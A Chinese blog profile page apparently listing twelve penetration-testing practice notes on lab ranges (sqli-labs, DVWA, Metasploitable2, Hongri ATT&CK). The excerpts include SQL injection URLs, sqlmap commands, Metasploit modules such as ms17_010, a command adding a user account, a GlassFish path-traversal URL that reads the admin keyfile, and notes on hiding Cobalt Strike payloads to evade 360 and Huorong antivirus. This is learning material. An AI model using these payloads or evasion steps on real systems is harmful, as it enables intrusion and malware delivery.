自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 免杀部分2

把那个hanzoInjection-master和cs生成的那个payload(二进制的raw 没有64位)放在一起运行可以过360跟火绒(都可以)Invoke-PSImage(物理机的)记得重新把文件重新导入如果在虚拟机弄把那个东西跟一个图片放在一起在加一个payload powershell (64位) 执行代码在cmd得到一个代码然后把生成的图片用cs的文件上传得到的地址去替换里面的东西sal a New-Object;

2024-05-12 20:27:23 1151

原创 sqlab靶场+免杀入门

http://192.168.75.139/sqllab/Less-1/?id=1' order by 4 --+http://192.168.75.139/sqllab/Less-1/?id=-1' union select 1,2,3--+http://192.168.75.139/sqllab/Less-1/?id=-1' union select 1,database(),version()--+http://192.168.75.139/sqllab/Less-1/?id=-1'union

2024-05-06 17:00:55 922 1

原创 红日三靶场

5.用蚁剑连接一下发现了命令执行不了用插件绕过,发现插件绕过只能Linux用,把蚁剑装到kali里面去,在连接一下发现可以用,点一下php7_GC_uaf php7_backtrace_uaf 发现得点两个才可以用可以成功命令执行但是是在192.168.93.120中。dirsearch -u http://192.168.0.104/ -e* 都可以扫描网站发现了/administrator进去查看一下,发现了joomla-cms网站。

2024-05-04 13:33:17 1156

原创 metasploitable2

这个靶机可以自己去网上下载,可以当做入门实战的一部分msfadmin msfadmin 账号密码nmap -sV -P0 IP 扫描服务 端口use exploit/multi/samba/usermap_script 一样。

2024-04-29 19:26:56 462 2

原创 DVWA下半部分

报错注入?sqlmap检测 其中的网址都得运行一下,然后再得到的LOWpython sqlmap.py -u "运行一下网站去得到网址" --cookie="开发者模式去得到cookie" 为了看是否有sql注入的漏洞python sqlmap.py -u "运行一下网站去得到网址" --cookie="开发者模式去得到cookie" --dbs 得到数据库的名称。

2024-04-25 21:17:41 1781 2

原创 DVWA通关 (上半部分)

burp 有四种模式 单个的,攻城锤的这两个都是一个payload 鱼叉和炸弹两个payload 鱼叉用在高级 ,低级和中级都用炸弹。

2024-04-21 15:32:02 787 3

原创 红日二(3台)

在里面再开一个远程控制,控制10.10.10.10,用添加的账号密码来操作,在10.10.10.10,中再开远程操作或者在192.168.75.128开远程也可以,用刚刚得到的那个本地域账号密码,这个可以跳过360,进去10.10.10.201,去把360关了,因为10.10.10.201也有445漏洞,或者用cs的凭证攻击,第一台的防火墙可以通过那个哥斯拉关,10.10.10.10. 10.10.201的防火墙得先关否则都进不去。web admin@123 10.10.10.80 +外网。

2024-04-19 17:51:27 1026 4

原创 红日一(简单)

(上面是添加打开23telnet端口的命令利用,use auxiliary/scanner/telnet/telnet_login 攻击失败虽然会话建立起来了,但是是用不了)run post/multi/gather/ping_sweep rhosts=192.168.52.0/24(使用1,3,4)【内网渗透实战——红日ATT&CK系列靶场(一)学习笔记 - CSDN App】http://t.csdnimg.cn/O6MXw。SELECT '<?>'(一个一个试发现只能用日志写一句话木马)

2024-04-16 20:03:39 898

原创 红日8第四层(两台)

在第三层过来时记得加上网段然后就可以用nmap扫描发现了 135,445,139等端口,漏洞扫描发现了ms17_010用模块扫描一下发现了真的有ms17_010use 0 到use 1 都不行(怀疑有那个防火墙)use 2可以执行 命令执行set command net user (尝试一下看用户)runset command net user zgx620 zgx@620 /add (添加用户)run。

2024-04-05 11:27:08 701 1

原创 红日8实战靶场(第三层总结)

172.16.10.130 +nat 192.168.75.135(这个环境可能是需要这个nat对外网的进行访问)将172.16.10.130 都换成192.168.75.135。

2024-03-30 17:32:38 1925

原创 红日8 实战篇章(第二层)

这个是第一层的第一台ip为一个nat网卡同网段加上与第二层连接的ip我的是192.168.75.135 +192.168.3.0/24(属于192.168.3.0/24网段的ip)这个是第二层的(一共五台)这个五台分为四部分虽然是四部分但是都是属于 192.168.3.0/24(网段)账号密码都在那个虚拟机的进入界面第一部分的 192.168.3.77+192.168.3.76第二部分的 192.168.3.75第三部分的 192.168.3.144。

2024-03-24 09:58:37 2195 1

原创 红日8 靶场实战 (一共九台)

https://192.168.75.135:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afglassfish/glassfish4/glassfish/domains/domain1/config/admin-keyfile (里面有那个平台的账号密码)模块通过 JMX 服务的远程连接指示靶机下载并执行这个恶意代码。

2024-03-21 14:54:05 1395 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除